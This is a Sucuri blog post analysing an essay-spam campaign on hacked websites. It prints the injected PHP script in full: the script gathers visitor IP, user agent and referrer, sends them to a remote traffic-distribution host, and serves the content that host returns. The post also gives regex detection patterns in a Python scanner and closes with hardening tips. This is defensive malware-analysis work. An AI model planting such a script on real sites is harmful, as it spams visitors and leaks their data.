Sucuri Blog

Website Security News

Malicious Subdirectories Strike Again

March 17, 2017, by Fernando Barbosa

In a previous post, we illustrated how attackers were fetching information from compromised sites under their control to display spam content on other hacked websites. By adding malicious files into a directory and using the victim’s database structure, attackers were able to inject ads and promote their products.

This time, attackers used a similar technique with a little bit more sophistication to achieve their goals.

Essay Spam Campaign

This technique is now being used to distribute essay spam targeted at students. This type of spam is actually quite common and we’ve seen many strategies being used to propagate it throughout the years.

In this scenario, attackers injected a ./blog folder into the victim’s website, pretending to be a legitimate blog directory. However, when you try to access it in a browser, it shows an essay website that should not be there:

Essay spam site content

What makes it even more interesting is the fact that every time you reload the page, it shows a completely different essay website.

Essay content after reloading

Malicious Subdirectories

Inside the ./blog folder there are directories full of PHP files with essay-related filenames. Those files all share the following PHP code:

<?php error_reporting( E_ERROR );
$apiKey = '3d62404a441c24f8357d50dd66146bbc';
$campaignId = 'CxFtyM';
$keyword = urlencode('hXXp://infected-website[.]com/blog/path-to-file/file[.]php');
$ua = urlencode($_SERVER['HTTP_USER_AGENT']);
$lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
// Work out the visitor's real IP address, even behind a proxy or CDN
$ip = null;
$headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR');
foreach ($headers as $header) {
    if (!empty($_SERVER[$header])) {
        $ip = $_SERVER[$header];
        break;
    }
}
if (strstr($ip, ',')) {
    $tmp = explode(',', $ip);
    if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) {
        $ip = trim($tmp[count($tmp) - 2]);
    } else {
        $ip = trim($tmp[0]);
    }
}
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
    $ip = trim($tmp[0]);
} else {
    $ip = $_SERVER['REMOTE_ADDR'];
}
$referrer = urlencode($_SERVER['HTTP_REFERER']);
// Send the visitor profile and campaign identifiers to the traffic distribution system (TDS)
$url = "hXXp://gotopplz[.]xyz/tds/api[.]php?action=get&api_key=$apiKey&campaign=$campaignId&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang";
$rCURL = curl_init();
curl_setopt($rCURL, CURLOPT_URL, $url);
curl_setopt($rCURL, CURLOPT_HEADER, 0);
curl_setopt($rCURL, CURLOPT_RETURNTRANSFER, 1);
$aData = curl_exec($rCURL);
curl_close($rCURL);
// Replay whatever headers and body the TDS instructs the script to serve
$result = json_decode($aData);
if ($result->redirect) {
    foreach ($result->redirect->headers as $header) {
        header($header);
    }
    if ($result->redirect->content) {
        echo $result->redirect->content;
        exit;
    }
}
?>
...

The malicious code gathers information from the visitor, such as:

  • User Agent
  • IP Address
  • Referrer
  • HTTP Accept-Language

The information is then sent to gotopplz[.]xyz, which returns JSON content.

Campaign Tracking

Before going further, it’s very important to note two variables – $apiKey and $campaignId – being sent through that link. The objective of this campaign is ultimately monetary gain, so those variables are probably used to identify the specific campaign and distribute the profits (similar to affiliate tracking).

Here is the JSON returned by gotopplz[.]xyz:

{
  "stream": {"id": 0, "campaign_id": 2, "url": "https:\/\/speedypaper.com\/?rt=RSTOKqCq"},
  "redirect": {
    "type": "frame",
    "headers": [],
    "content": "<html><frameset rows=\"100%\"><frame src=\"hXXps:\/\/speedypaper[.]com\/?rt=RSTOKqCq\"><\/frameset><\/html>"
  }
}

This will get content from speedypaper[.]com/?rt=RSTOKqCq and display it on the malicious website.

Here are some other websites that can be fetched by the script to display essay content:

  • papercoach[.]net/?rt=bhj3CqYE
  • extraessay[.]com?key_wpg=7e989c5e16fd8da4cdfa23a244128bfa
  • myadmissionsessay[.]com/?pid=3322
  • speedypaper[.]com/?rt=RSTOKqCq

To prevent search engines from seeing the spam content, the script will return a “404 Not Found” error for user agents like Googlebot and MSNbot.

Below the PHP we shared above, there is a full essay HTML page that will be displayed if the script cannot get the desired content from gotopplz[.]xyz. This ensures the content can be displayed even if cURL is disabled on the server.
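The script above has a recognisable shape: proxy-aware IP collection, a call to a remote tds/api.php carrying api_key and campaign parameters, json_decode of the reply, replay of the returned headers and content, and an HTML fallback page after the closing PHP tag. The following scanner, written for this post and not part of Sucuri's tooling, scores PHP files under a webroot against those traits; the indicator weights, the threshold and the sample files (with a placeholder TDS host) are constructed for the example.

```python
import os, re, tempfile
# Heuristics distilled from the essay-spam script in the post. The weights and
# the threshold are assumptions made for this example, not values from Sucuri.
INDICATORS = [
    ("proxy_ip_headers", re.compile(r"HTTP_X_FORWARDED_FOR.*HTTP_CF_CONNECTING_IP", re.S), 1),
    ("tds_api_call", re.compile(r"/tds/api\.php\?action=get&api_key=", re.I), 3),
    ("remote_fetch", re.compile(r"curl_exec\s*\(|file_get_contents\s*\(\s*\$url", re.I), 1),
    ("json_redirect", re.compile(r"json_decode.*->redirect->headers", re.S), 2),
    ("echo_remote_content", re.compile(r"echo\s+\$\w+->redirect->content"), 2),
    ("html_after_php", re.compile(r"\?>\s*<(!DOCTYPE|html)", re.I), 1),
]
THRESHOLD = 4

def score_source(src):
    # Return (score, matched indicator names) for one PHP source text.
    hits = [name for name, rx, _ in INDICATORS if rx.search(src)]
    return sum(w for name, _, w in INDICATORS if name in hits), hits

def scan_tree(root):
    # Walk a webroot; report PHP files whose score reaches THRESHOLD.
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, hits = score_source(fh.read())
            if score >= THRESHOLD:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = (score, hits)
    return findings

# Constructed samples: the script's structure with a placeholder TDS host, and a benign file.
SPAM_SAMPLE = """<?php error_reporting(E_ERROR);
$headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR');
$url = "http://tds-host.invalid/tds/api.php?action=get&api_key=$apiKey&campaign=$campaignId";
$result = json_decode(curl_exec($rCURL));
foreach ($result->redirect->headers as $h) header($h); echo $result->redirect->content;
?><html><body>fallback essay page shown when the TDS is unreachable</body></html>"""
BENIGN_SAMPLE = "<?php\n$ip = $_SERVER['REMOTE_ADDR'];\necho json_encode(['ip' => $ip]);\n"

def demo():
    # Plant both samples in a temporary webroot and scan it.
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "blog", "essays"))
        with open(os.path.join(root, "blog", "essays", "buy-essay.php"), "w") as fh:
            fh.write(SPAM_SAMPLE)
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(BENIGN_SAMPLE)
        return scan_tree(root)
```

Point scan_tree at a real document root and review every reported file by hand; a single weak indicator (for example a proxy header loop) is common in legitimate code, which is why only the combination scores above the threshold.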

How to Protect Your Site

Here are some good security practices to protect your website moving forward:

  1. Update your software. This includes your CMS (WordPress, Joomla, etc.), plugins, themes, and server software. Outdated software is the leading cause of website infections and reinfections.
  2. Use strong passwords. From your administrator login page to FTP users, always choose long, complex, and unique passwords for your website management accounts.
  3. Check your core file integrity. Malicious code is often inserted into core files. If you’re using WordPress, you can install our free security plugin which provides a core file integrity check.
  4. Use a Web Application Firewall. A WAF will filter all HTTP/HTTPS traffic between your server and your visitors, blocking known attacks and virtually patching your site even if you forget to update.

If you believe your website has been infected and need specialized assistance in website security to clean and protect your website, let us know.


Categories: WordPress Security. Tags: Conditional Malware, Google, Hacked Websites, SEO Spam

About Fernando Barbosa

Fernando Barbosa is Sucuri's Software Development Manager and joined the company in 2012. Fernando's main responsibilities include leading Sucuri's backend teams and engineering solutions for our suite of security products. His professional experience also covers five years of malware analysis and incident response. When Fernando isn't working, you might find him having good times with his family. Connect with Fernando on Twitter.
